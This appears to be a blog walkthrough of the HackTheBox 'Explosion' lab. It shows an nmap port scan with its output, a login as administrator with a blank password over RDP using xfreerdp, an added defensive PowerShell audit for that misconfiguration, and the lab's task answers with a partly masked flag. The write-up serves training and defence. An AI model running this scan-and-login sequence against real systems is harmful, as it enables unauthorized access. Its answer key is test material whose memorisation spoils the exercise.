Hey folks, how's it going?
Today I'm bringing the walkthrough of the Explosion lab from HTB's Starting Point.
Capture the Flag
First, I ran nmap to discover the open ports. Several ports are open; the focus of this lab is port 3389, the RDP protocol.
nmap -sSV -p- -Pn 10.129.176.127 --min-rate=1000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-23 09:11 EST
Nmap scan report for 10.129.23.134
Host is up (0.19s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
It was possible to log in via RDP with the credential:
User: administrator
Password: (blank)
xfreerdp /v:10.129.176.127 /u:administrator
After logging in, the flag was captured.
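Added example, not part of the original write-up: a PowerShell audit for the misconfiguration this lab depends on, an RDP-reachable local account that logs on with an empty password. The registry values and Get-LocalUser properties are standard Windows ones; the script layout, the Get-RegValue helper and the messages are this example's own.

```powershell
# Added example: audit for an RDP-reachable local account with an empty password.
# Run in an elevated PowerShell session on the Windows host being reviewed.
$ts  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$rdp = "$ts\WinStations\RDP-Tcp"
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-RegValue([string]$Path, [string]$Name) {
    # Hypothetical helper: returns $null when the key or value is absent.
    (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
}

$findings = @()

# fDenyTSConnections = 0: Remote Desktop accepts connections (port 3389 by default).
if ((Get-RegValue $ts 'fDenyTSConnections') -eq 0) {
    $findings += 'Remote Desktop is enabled'
}

# UserAuthentication = 0: Network Level Authentication is not required.
# Group Policy can override this local value.
if ((Get-RegValue $rdp 'UserAuthentication') -eq 0) {
    $findings += 'NLA is not required for RDP connections'
}

# LimitBlankPasswordUse = 0: blank-password accounts may log on over the network,
# not only at the console (policy "Accounts: Limit local account use of blank
# passwords to console logon only" is disabled).
if ((Get-RegValue $lsa 'LimitBlankPasswordUse') -eq 0) {
    $findings += 'Blank-password accounts are allowed to log on remotely'
}

# PasswordRequired = $false: the account is permitted to have an empty password.
# PasswordLastSet = $null: no password-set time is recorded for the account.
$weak = Get-LocalUser | Where-Object {
    $_.Enabled -and (-not $_.PasswordRequired -or $null -eq $_.PasswordLastSet)
}
foreach ($u in $weak) {
    $findings += "Enabled account '$($u.Name)' may have an empty password"
}

if ($findings.Count -eq 0) {
    'No blank-password RDP exposure found by these checks.'
} else {
    $findings | ForEach-Object { "FINDING: $_" }
}
```

Setting a password on the flagged account and keeping LimitBlankPasswordUse at 1 closes the logon path shown in this lab.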
Tasks
TASK 1 – What does the 3-letter acronym RDP stand for?
A: Remote Desktop Protocol
TASK 2 – What is a 3-letter acronym that refers to interaction with the host through a command line interface?
A: CLI
TASK 3 – What about graphical user interface interactions?
A: GUI
TASK 4 – What is the name of an old remote access tool that came without encryption by default and listens on TCP port 23?
A: telnet
TASK 5 – What is the name of the service running on port 3389 TCP?
A: ms-wbt-server
TASK 6 – What is the switch used to specify the target host’s IP address when using xfreerdp?
A: /v:
TASK 7 – What username successfully returns a desktop projection to us with a blank password?
A: administrator
SUBMIT FLAG – Submit root flag
A: 951fa96d7830c451XXXXXXXXXXX